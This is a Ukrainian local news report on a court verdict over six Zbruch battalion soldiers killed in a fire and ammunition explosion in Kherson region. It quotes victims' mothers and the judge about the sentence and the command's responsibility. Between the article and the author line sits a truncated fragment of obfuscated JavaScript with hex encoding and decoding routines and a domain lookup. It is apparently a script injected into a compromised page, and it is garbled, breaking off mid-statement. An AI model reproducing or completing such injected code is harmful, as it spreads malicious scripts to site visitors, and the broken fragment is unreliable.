Ви знаходитесь: Головна / Новини / Суд виніс вирок у справі загибелі шести бійців батальйону «Збруч»

Суд виніс вирок у справі загибелі шести бійців батальйону «Збруч»

Суд виніс вирок у справі загибелі шести бійців батальйону «Збруч». Нагадаємо, трагедія сталася на початку лютого минулого року, на Херсонщині. Внаслідок пожежі та вибуху боєприпасів чимало бійців тоді отримали поранення та опіки, а шестеро бійців з Тернопільщини – загинули.

Зібрати докази та знайти винуватця пожежі у цій справі було важко. Деякі свідки, за словами матерів загиблих, звинувачують у займанні палаток – бійця із іншої бригади, яка на той момент ще не покинула місце дислокації. На нього і подали позов до суду.

НАДІЯ СИКЛІЦКА, мама загиблого Назарія Сикліцкого

«Ми тут знаємо, батьки, що дійсно він скоював цей злочин. Тому, що є хлопці, які підтверджують, що це тільки його вина. Хоча він в тому відмовляється».

Звинувачений Олексій Власюк свою провину у загибелі шести бійців не визнає. На судді пояснює, конфлікт, який стався між ним та бійцями батальйону «Збруч» вичерпався ще до пожежі. Однак, таку позицію суд розцінив, як спосіб захисту, оскільки її спростували, як покази потерпілих та свідків, так і висновки експертів.

ЛЮБОМИРА СЛИВКА, суддя Тернопільського міськрайонного суду

«Ствердження Власюка щодо його невинуватості у вчиненні кримінального правопорушення передбаченого частиною 2, статті 412 ККУ, повністю спростовані перевіреними у судовому засіданні вищенаведеними доказами обставин кримінального провадження, тому оцінює їх критично і вважає їх неправдивими, спрямованими на ухилення від кримінальної відповідальності».

Водночас, повної вини Власюка у скоєному, суд також не вбачає.

ЛЮБОМИРА СЛИВКА, суддя Тернопільського міськрайонного суду

«Суд приходить до висновку про відсутність в діях Власюка складу кримінального правопорушення, передбаченого ч.4.ст.270 ККУ. При цьому суб’єктом злочину є особа, на яку покладено обов’язки з дотримання відповідних правил, натомість, на Власюка вказані обов’язки покладені не були. За наведених обставин Власюка слід виправдати за ч.2.ст.270 ККУ за раніше пред’явленим обсягом обвинувачення».

Враховуючи ступінь тяжкості злочинів Олексія Власюка, суд виніс вирок у вигляді позбавлення волі на 3 роки та грошове стягнення, приблизно у півтори сотні тисяч гривень. Матері загиблих бійців кажуть, оскільки правова оцінка дій командування бригади не надана, винних покарано не повністю.

НАДІЯ СИКЛІЦКА, мама загиблого Назарія Сикліцкого

«Будемо писати на командування, то мови немає. Щоб нині тобі совість не дозволили прийти хоча б глянути тим людям в очі, що віддали найдорожче».

За словами матерів, командири мають понести відповідальність за те,  що не було належних умов. Заґратовані вікна та єдиний вихід з ангару майже не залишили загиблим шансів врятуватися.

 

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top